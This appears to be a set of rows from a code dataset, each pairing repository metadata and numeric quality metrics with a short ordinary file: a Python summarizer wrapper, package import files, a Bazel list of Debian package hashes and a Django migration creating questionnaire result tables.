core/textsummarize.py
|
tonymazn/cs410
|
6abcd5762a1e5b131220651d2a82e6fac29b55fe
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from string import punctuation
from .summarizer import *
def get_summary(text, count, algorithm_name):
return convert_to_text(get_summary_result(text, count, algorithm_name))
| 18.909091
| 75
| 0.75
| 28
| 208
| 5.321429
| 0.678571
| 0.134228
| 0.241611
| 0.295302
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005618
| 0.144231
| 208
| 10
| 76
| 20.8
| 0.831461
| 0.100962
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
dfe86162496523bf90e46ab022930a12cdc8b8d1
| 102
|
py
|
Python
|
eggdriver/news/__init__.py
|
PythonForChange/eggdriver
|
bcf1da6dcb2a8daf3144c7af8d1d04f8844be2fc
|
[
"MIT"
] | 3
|
2021-09-25T01:22:31.000Z
|
2021-11-28T23:25:46.000Z
|
eggdriver/news/__init__.py
|
PythonForChange/eggdriver
|
bcf1da6dcb2a8daf3144c7af8d1d04f8844be2fc
|
[
"MIT"
] | null | null | null |
eggdriver/news/__init__.py
|
PythonForChange/eggdriver
|
bcf1da6dcb2a8daf3144c7af8d1d04f8844be2fc
|
[
"MIT"
] | null | null | null |
from eggdriver.news.app import *
from eggdriver.news.config import *
from eggdriver.news.news import *
| 34
| 35
| 0.803922
| 15
| 102
| 5.466667
| 0.4
| 0.47561
| 0.621951
| 0.560976
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107843
| 102
| 3
| 36
| 34
| 0.901099
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
a051c3240f7f97b08d6062627ce105d6ae0f96dd
| 144
|
py
|
Python
|
app/tempBerry/smarthome/models/__init__.py
|
ChristianKreuzberger/tempBerry
|
d4a9fe543df57ebdb82d6ebf398607ccf9e6c0bf
|
[
"MIT"
] | 2
|
2019-07-16T19:09:50.000Z
|
2020-01-03T09:06:46.000Z
|
app/tempBerry/smarthome/models/__init__.py
|
ChristianKreuzberger/tempBerry
|
d4a9fe543df57ebdb82d6ebf398607ccf9e6c0bf
|
[
"MIT"
] | null | null | null |
app/tempBerry/smarthome/models/__init__.py
|
ChristianKreuzberger/tempBerry
|
d4a9fe543df57ebdb82d6ebf398607ccf9e6c0bf
|
[
"MIT"
] | 1
|
2020-02-09T22:46:05.000Z
|
2020-02-09T22:46:05.000Z
|
from tempBerry.smarthome.models.models import *
from tempBerry.smarthome.models.base import *
from tempBerry.smarthome.models.handlers import *
| 36
| 49
| 0.833333
| 18
| 144
| 6.666667
| 0.388889
| 0.325
| 0.55
| 0.7
| 0.566667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 144
| 3
| 50
| 48
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
a08494f4c74b5a7fbb167c2da6055672dbabb93b
| 213
|
bzl
|
Python
|
debian/m4.bzl
|
AustinSchuh/971-Robot-Code
|
99abc66fd2d899c0bdab338dc6f57dc5def9be8d
|
[
"Apache-2.0"
] | 39
|
2021-06-18T03:22:30.000Z
|
2022-03-21T15:23:43.000Z
|
debian/m4.bzl
|
AustinSchuh/971-Robot-Code
|
99abc66fd2d899c0bdab338dc6f57dc5def9be8d
|
[
"Apache-2.0"
] | 10
|
2021-06-18T03:22:19.000Z
|
2022-03-18T22:14:15.000Z
|
debian/m4.bzl
|
AustinSchuh/971-Robot-Code
|
99abc66fd2d899c0bdab338dc6f57dc5def9be8d
|
[
"Apache-2.0"
] | 4
|
2021-08-19T19:20:04.000Z
|
2022-03-08T07:33:18.000Z
|
files = {
"libsigsegv2_2.12-2_amd64.deb": "78d1be36433355530c2e55ac8a24c41cbbdd8f5a3c943e614c8761113a72cb8d",
"m4_1.4.18-2_amd64.deb": "37076cc03a19863eb6c4ec2afb3e79328c19fdc506176bfe8ffcada6d0f7d099",
}
| 42.6
| 103
| 0.821596
| 16
| 213
| 10.6875
| 0.75
| 0.070175
| 0.105263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.467005
| 0.075117
| 213
| 4
| 104
| 53.25
| 0.401015
| 0
| 0
| 0
| 0
| 0
| 0.830986
| 0.830986
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
39fc51c2098c956b44f04e2f256b45cb43565fd0
| 2,422
|
py
|
Python
|
Questionnaire/migrations/0004_commonfeaturetable_transferstimulitable.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
Questionnaire/migrations/0004_commonfeaturetable_transferstimulitable.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
Questionnaire/migrations/0004_commonfeaturetable_transferstimulitable.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.2 on 2020-07-20 11:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('Questionnaire', '0003_auto_20200720_1101'),
]
operations = [
migrations.CreateModel(
name='CommonFeatureTable',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('set_number', models.IntegerField(default=None)),
('block_number', models.IntegerField(default=None)),
('sequence_number', models.IntegerField(default=None)),
('file_name', models.CharField(default=None, max_length=150)),
('user_option', models.CharField(default=None, max_length=10)),
('correct_option', models.CharField(default=None, max_length=10)),
('rule_based', models.IntegerField(default=None)),
('time_taken', models.FloatField(default=None)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Questionnaire.UserDetails')),
],
options={
'verbose_name_plural': 'Common Feature Test Table',
},
),
migrations.CreateModel(
name='TransferStimuliTable',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('set_number', models.IntegerField(default=None)),
('block_number', models.IntegerField(default=None)),
('sequence_number', models.IntegerField(default=None)),
('file_name', models.CharField(default=None, max_length=150)),
('user_option', models.CharField(default=None, max_length=10)),
('rule_based', models.IntegerField(default=None)),
('time_taken', models.FloatField(default=None)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Questionnaire.UserDetails')),
],
options={
'verbose_name_plural': 'Transfer Stimuli Table',
},
),
]
| 46.576923
| 124
| 0.594963
| 234
| 2,422
| 5.982906
| 0.333333
| 0.117857
| 0.142857
| 0.165714
| 0.770714
| 0.770714
| 0.770714
| 0.770714
| 0.770714
| 0.770714
| 0
| 0.024321
| 0.270025
| 2,422
| 51
| 125
| 47.490196
| 0.767534
| 0.01858
| 0
| 0.666667
| 1
| 0
| 0.175579
| 0.030737
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.044444
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.